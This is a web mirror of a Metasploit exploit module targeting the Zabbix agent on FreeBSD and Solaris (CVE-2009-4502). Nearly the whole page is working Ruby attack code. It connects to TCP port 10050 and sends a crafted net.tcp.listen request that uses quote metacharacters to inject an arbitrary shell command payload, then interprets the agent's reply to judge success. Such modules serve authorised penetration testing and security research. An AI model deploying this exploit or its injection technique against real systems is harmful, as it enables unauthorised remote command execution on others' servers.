CoCalc -- zabbix_agent

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/unix/misc/zabbix_agent_exec.rb
¹⁹⁵⁰⁰ views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::Tcp
10

11
  def initialize(info = {})
12
    super(
13
      update_info(
14
        info,
15
        'Name' => 'Zabbix Agent net.tcp.listen Command Injection',
16
        'Description' => %q{
17
          This module exploits a metacharacter injection vulnerability
18
          in the FreeBSD and Solaris versions of the Zabbix agent. This flaw
19
          can only be exploited if the attacker can hijack the IP address
20
          of an authorized server (as defined in the configuration file).
21
        },
22
        'Author' => [ 'hdm' ],
23
        'License' => MSF_LICENSE,
24
        'References' => [
25
          [ 'CVE', '2009-4502' ],
26
          [ 'OSVDB', '60956' ],
27
          [ 'URL', 'https://support.zabbix.com/browse/ZBX-1032'],
28
        ],
29
        'Platform' => ['unix'],
30
        'Arch' => ARCH_CMD,
31
        'Privileged' => false,
32
        'Payload' => {
33
          'BadChars' => "'",
34
          'Space' => 1024,
35
          'DisableNops' => true,
36
          'Compat' =>
37
                        {
38
                          'PayloadType' => 'cmd',
39
                          'RequiredCmd' => 'generic perl telnet',
40
                        }
41
        },
42
        'Targets' => [
43
          [ 'Automatic Target', {}]
44
        ],
45
        'DefaultTarget' => 0,
46
        'DisclosureDate' => '2009-09-10',
47
        'Notes' => {
48
          'Reliability' => UNKNOWN_RELIABILITY,
49
          'Stability' => UNKNOWN_STABILITY,
50
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
51
        }
52
      )
53
    )
54

55
    register_options(
56
      [
57
        Opt::RPORT(10050)
58
      ]
59
    )
60
  end
61

62
  def exploit
63
    connect
64

65
    rnd_port = rand(1024) + 1
66
    buf = "net.tcp.listen[#{rnd_port}';#{payload.encoded};']\n"
67

68
    print_status("Sending net.tcp.listen() request to the zabbix agent...")
69
    sock.put(buf)
70

71
    res = nil
72
    begin
73
      res = sock.get_once(-1, 5)
74
    rescue ::EOFError
75
    end
76

77
    if !res
78
      print_status("The zabbix agent did not reply, our IP must not be in the allowed server list.")
79
      disconnect
80
      return
81
    end
82

83
    if (res =~ /ZBX_NOTSUPPORTED/)
84
      print_status("The zabbix agent is not running a vulnerable version or operating system.")
85
      disconnect
86
      return
87
    end
88

89
    if (res !~ /ZBXD/)
90
      print_status("The zabbix agent returned an unknown response.")
91
      disconnect
92
      return
93
    end
94

95
    print_status("The zabbix agent should have executed our command.")
96
    disconnect
97
  end
98
end
99

100
Product

Resources

Company
